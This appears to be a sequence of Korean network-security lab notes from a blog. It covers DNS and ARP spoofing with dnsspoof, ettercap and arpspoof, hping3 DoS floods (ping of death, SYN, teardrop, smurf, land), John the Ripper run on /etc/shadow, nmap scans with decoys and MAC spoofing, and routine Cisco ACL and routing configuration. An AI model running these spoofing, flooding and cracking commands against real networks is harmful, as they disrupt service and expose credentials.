칼리에서 실행

# service apache2 restart

 

 

arp 스푸핑 후,

 

vi dns.txt

 

dnsspoof -f /root/dns.txt

 

windows 7에서 위의 도메인을 치게되면 칼리에서 만든 웹페이지로 접속 된다.

 

 

 

ettercap

vi /etc/ettercap/etter.dns    

 

ettercap -G  //dettercap 실행

 

scan을 해서 공격 대상자를 찾는다.

 

scan한 리스트를 확인한다.

arp 포이즈닝을 통해 맥주소를 같게 만들어준다.

 

게이트웨이를 타겟1로 설정

공격 대상자를 타겟2로 설정

 

공격플러그인 목록

 

dns_spoof 플러그인 선택

 

 

아까 etter.dns안에 넣은 도메인 주소가 공격자 도메인으로 바뀜.

 

 

 

 

 

 

 

 

 

 

 

 

 

 


 

 

 


 

 

'Network Security' 카테고리의 다른 글

ssh 스니핑  (0) 2019.02.08
ettercap dos공격  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01
john the ripper  (0) 2019.02.01

arpspoof

 

 

 

공격자 : 192.168.232.100

공격 대상자 (windows7) : 192.168.232.120

 

arpspoof -t [타겟 ip] [게이트웨이]

arpspoof -t 192.168.232.120 192.168.232.2

 

 

 

 

 

공격자와 게이트웨이의 맥주소가 같아지면 스푸핑 공격이 성공한 것이다.

 

 

arpspoof -t 192.168.232.2 192.168.232.120

 //반대로 한번 더 확실하게 스푸핑됨. 이 작업을 하게 되면

   fragrouter로도 인터넷이 안될 때도 있다.

 

fragrouter -B1

//칼리에서 공격한 후 즉시 실행 해줘야 공격 대상자의 인터넷이 안끈킴

 

 

게이트웨이 맥주소와 공격자의 맥주소가 같아지면 성공한 것이다.


 

 

ftp에 접속을 하게 되면

이런식으로 스니핑이 가능하다.

 

 

 

 

'Network Security' 카테고리의 다른 글

ettercap dos공격  (0) 2019.02.07
DNS 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01
john the ripper  (0) 2019.02.01
스캐닝  (0) 2019.01.30

공격자 ip :192.168.232.100

대상자 ip :192.168.232.101

 

 

ping of death

 

hping3 --icmp --rand-source 192.168.232.101 -d 65000 --flood

//랜덤한 아이피 주소로 192.168.232.101 에게 핑을 최대크기로 보낸다.

 

 

공격 당한 컴퓨터 상태


 

 

속도가 엄청 느려진것 을 느낄수 있다.

Syn Flooding

hping3 --rand-source 192.168.232.101 -p 80 -S --flood

//Syn 패킷을 보냄

 

 

공격 당한 컴퓨터 상태

//메모리까지 상승하게 된다.

 

 

Tear Drop  //패킷분할공격

hping3 -a 192.168.232.100 192.168.232.101 --id 3200 -o 123456 -M 3232 -p 21 -d 3200 --flood

 

 

smurf 공격

hping3 -a 192.168.232.101 192.168.232.255 --icmp --flood

 

land attack

hping3 -a 192.168.232.101 192.168.232.101 --icmp --flood

 

centos7 작업관리자 //gnome-system-monitor

 

'Network Security' 카테고리의 다른 글

DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07
john the ripper  (0) 2019.02.01
스캐닝  (0) 2019.01.30
ACL(접근 통제 목록)  (0) 2019.01.29

패스워드 크래킹 툴이다.

 

 

john /etc/shadow   //shadow에 있는 root 비번 크랙

 

john --show /etc/shadow  //크랙한 것을 보여줌

 

'Network Security' 카테고리의 다른 글

arp 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01
스캐닝  (0) 2019.01.30
ACL(접근 통제 목록)  (0) 2019.01.29
OSPF  (0) 2019.01.28

 

[스캐닝]

 

[종류]

TCP

open Scan :TCP Connected     

half open scan :SYN(크게보면 은닉스캔으로 볼수있다.)

Stealth scan(은닉스캔) : Null,X-mas,FIN 

 

  //Stealth scan과 udp scan의 차이

Stealth scan(은닉스캔) 

- 포트 open : 아무 응답이 돌아오지 않음

- 포트 close : RST+ACK가 돌아온다.

 

UDP SCAN

- 포트 open : 아무 응답이 돌아오지 않음

- 포트 close : ICMP unreachable                    

 

 

 

 

 

 

 

 

 

iptables REJECT : 차단 되었다고 알려줌

            DROP : 아예무시하고 차단함.

            ACCEPT : 열림

 

systemctl restart firewalld   //Centos7 방화벽 재시작

service iptables stop //sulinux 방화벽 끄기

 

nmap

nmap 옵션을 주지 않고 ip만 입력 했을 시 전체 포트가 스캔됨.

 [옵션]

 -sT // tcp 스캔

 -sU // udp 스캔

 -sP // 해당 네트워크 대역에 살아있는 호스트 스캔

 -O //상대방에 OS를 알려주는 옵션

 -open //열린 포트만 확인

 -reason //왜 열리고 왜 닫혔는지 이유를 알려줌

 -n  ip주소를  DNS호스트명으로 바꾸지 않기때문에 속도가 빠르다. 

 -v //진행과정을 보여준다.

 -A  // os나 포트열린 것 등등 전부 다 보여준다.

 -top-port n // 맨위의 n개만큼 보여줘라

 -f    //패킷을 분할해서 보낸다.

 --mtu n  //n의값으로 mtu값을 바꿔서 보낸다.

 -D RND:10 //ip주소를 10개씩 랜덤하게 보낸다.

 -data-length 60 //데이터의길이를 60으로 변경해서 보낸다.

 -randomize-hosts 192.168.232.110-254

 //주어진 네트워크주소를 전부 스캔한다.

    //스텔스 모드 명령어

 -sX

 -sF

 -sN

 -iL ./파일명 //파일안에 있는 아이피주소 만큼 스캔

 -n -D 100.100.100.100,100.100.100.200,100.100.100.250 192.168.232.110 

//100.100.100.100,100.100.100.200,100.100.100.250 으로 스푸핑되서 보냄

-o  //로그저장

--spoof-mac 00:00:00:00:00 192.168.232.110 //mac주소를 스푸핑해서 보냄

# nmap -sT [공격대상자ip주소]  //포트스캔

 

 

 

 

#nmap -sP 192.168.232.0/24

 


 

 

 

#nmap -O 192.168.232.110


 

#nmap -sT -f 192.168.232.110

 

# nmap -iL ./scan.txt

 

 

vi scan.txt

 

# nmap -sT 192.168.232.110 -o tcp.txt

 

nmap --spoof-mac 00:00:00:00:00 192.168.232.110


 

'Network Security' 카테고리의 다른 글

Dos  (0) 2019.02.01
john the ripper  (0) 2019.02.01
ACL(접근 통제 목록)  (0) 2019.01.29
OSPF  (0) 2019.01.28
redistribute(재분배)  (0) 2019.01.28

[ACL]

 

[표준 ACL]

 -<1-99> 번을주면 표준

 

 - 출발지 IP 주소만 참조

 - 라우터의 부담이크다. 그렇기때문에 네트워크 효율이 좋은 쪽에

   걸어야 한다.

 - 모든 서비스를 차단할 때만 사용하는 것이 효율적이다.

 

Router2  //ACL적용 라우터

 

Router(config)#access-list 1 deny 192.168.10.0 0.0.0.255

//192.168.10.0 의 네트워크를 전부 차단
Router(config)#access-list 1 permit any

//라우터는 암묵적으로 deny기에 허용을 해줘야함.

//1 번을 제외한 나머지는 허용

Router(config)#int fa0/1

Router(config-if)#ip access-group 1 out

//패킷이 나가는 포트에 들어가서 acl 적용

 

[확장 ACL]

 

 - <100-199> 번을 주면 확장

 - 출발지,목적지 IP주소 참조

 - 표준과 다르게 많은 제약을 줄 수 있다.

 

 

 

웹만 차단

 

Router(config)#access-list 100 deny tcp 192.168.10.0 0.0.0.255 192.168.30.0 0.0.0.255 eq www

//192.168.10.0 네트워크에서 192.168.30.0 네트워크의 웹 차단

 

Router(config)#access-list 100 permit ip any any

//출발지와 목적지 둘다 참조하므로 any 2번

 


 

Router(config)#int f0/1 //ACL 적용

Router(config-if)#ip access-group 100 out

 

 

아래와 같이 웹이 차단된 것을 볼 수 있다.

 

 

'Network Security' 카테고리의 다른 글

john the ripper  (0) 2019.02.01
스캐닝  (0) 2019.01.30
OSPF  (0) 2019.01.28
redistribute(재분배)  (0) 2019.01.28
eigrp  (0) 2019.01.28
OSPF

 

 

Router0

Router(config)#router ospf 7  //숫자 아무거나줘도됨

Router(config-router)#network 192.168.70.0 0.0.0.255 area 0

//area 맞춰야한다.

Router(config-router)#network 1.1.70.0 0.0.0.255 area 0

Router1

Router(config)#router ospf 8  //숫자 아무거나줘도됨

Router(config-router)#network 192.168.80.0 0.0.0.255 area 0

//area 맞춰야한다.

Router(config-router)#network 1.1.70.0 0.0.0.255 area 0

 

 

area  2개이상 나누기

 

//핑크선 기준으로 단절된 네트워크 형성

 

Router0

Router(config-if)#router ospf 7

Router(config-router)#net 192.168.10.0 0.0.0.255 area 0

Router(config-router)#net 1.1.12.0 0.0.0.255 area 0

 

Router1

Router(config-if)#router ospf 7

 

Router(config-router)#net 1.1.12.0 0.0.0.255 area 0

Router(config-router)#net 1.1.23.0 0.0.0.255 area 1

Router2

Router(config-if)#router ospf 7

 

Router(config-router)#net 1.1.34.0 0.0.0.255 area 2

Router(config-router)#net 1.1.23.0 0.0.0.255 area 1

 

 

Router3

Router(config-if)#router ospf 7

 

Router(config-router)#net 1.1.34.0 0.0.0.255 area 2

Router(config-router)#net 192.168.20.0 0.0.0.255 area 2

 

loop를 통해 단절 네트워크 연결

// Area 0 : 백본 에어리어 Area2 : 단절 에어리어

// Area 1 : 경유 에어리어

 

 

1. Router1 lo0 : 2.2.2.2

Router(config)#interface loopback 0

Router(config-if)#ip address 2.2.2.2 255.255.255.0

//reboot해야 설정됨

Router(config-router)#area 1 virutal-link 3.3.3.3

//상대방 루프번호

2. Router2 lo0 : 3.3.3.3

Router(config)#interface loopback 0

Router(config-if)#ip address 3.3.3.3 255.255.255.0

//reboot해야 설정됨

Router(config-router)#area 1 virutal-link 2.2.2.2

//상대방 루프번호

'Network Security' 카테고리의 다른 글

스캐닝  (0) 2019.01.30
ACL(접근 통제 목록)  (0) 2019.01.29
redistribute(재분배)  (0) 2019.01.28
eigrp  (0) 2019.01.28
RIP  (0) 2019.01.28

redistribute(재분배)

// 다른 프로토콜을 재분배하여 연결해준다

 

Router5  //가운데 라우터기준으로 왼쪽은 RIPV2 오른쪽은 EIGRP

[EIGRP -> RIP]

Router(config-router)#router eigrp 7

Router(config-router)#redistribute rip metric 1544 20000 255 1 1500                       //Bandwidth , 딜레이 ,신뢰도 ,로딩,MTU

[RIP -> EIGRP]

Router(config-router)#router rip

Router(config-router)#ve 2

Router(config-router)#redistribute eigrp 7 metric 1

 

 

[EIGRP -> OSPF]

Router(config-if)#router eigrp 7

 

 

Router(config-router)#redistribute ospf 7 metric 1544 20000 255 1 1500

[OSPF -> EIGRP]

Router(config-router)#router ospf 7

 

 

Router(config-router)#redistribute eigrp 7 subnets

 

 

 

 


 

 


 

 


 

 

 

 

'Network Security' 카테고리의 다른 글

ACL(접근 통제 목록)  (0) 2019.01.29
OSPF  (0) 2019.01.28
eigrp  (0) 2019.01.28
RIP  (0) 2019.01.28
라우팅  (0) 2019.01.25

eigrp

 

 

 

Router0

Router(config)#router eigrp 7  //숫자가 양쪽 라우터 같아야함

Router(config-router)#network 1.1.45.0

Router(config-router)#network 192.168.40.0

Router(config-router)#no auto-summary

 

Router1

Router(config)#router eigrp 7

Router(config-router)#network 1.1.45.0

Router(config-router)#

%DUAL-5-NBRCHANGE: IP-EIGRP 7: Neighbor 1.1.45.1 (Serial0/0/0) is up: new adjacency            //설정이 잘 됐다는 것

Router(config-router)#network 192.168.50.0

Router(config-router)#no auto-summary

eigrp2 //2번째방법

 

Router(config)#router eigrp 7  //숫자가 양쪽 라우터 같아야함

Router(config-router)#network 1.1.45.1 0.0.0.0

Router(config-router)#network 192.168.40.1 0.0.0.0

Router(config-router)#no auto-summary

'Network Security' 카테고리의 다른 글

OSPF  (0) 2019.01.28
redistribute(재분배)  (0) 2019.01.28
RIP  (0) 2019.01.28
라우팅  (0) 2019.01.25
frame-relay  (0) 2019.01.24

 

 

 

 

RIP v2

 

Router0

Router(config)#router rip

Router(config-router)#version 2

Router(config-router)#network 1.1.12.0    

Router(config-router)#network 192.168.10.0

 //네트워크주소 2개를 라우터에게알려줌

Router(config-router)#no auto-summary 

 //축약하지 말라는 뜻(Distance는 다 줘야함)

Router1

Router(config)#router rip

Router(config-router)#version 2

Router(config-router)#network 1.1.12.0

Router(config-router)#network 192.168.20.0

Router(config-router)#no auto-summary

 

 

 






'Network Security' 카테고리의 다른 글

redistribute(재분배)  (0) 2019.01.28
eigrp  (0) 2019.01.28
라우팅  (0) 2019.01.25
frame-relay  (0) 2019.01.24
PPP인증  (0) 2019.01.24

+ Recent posts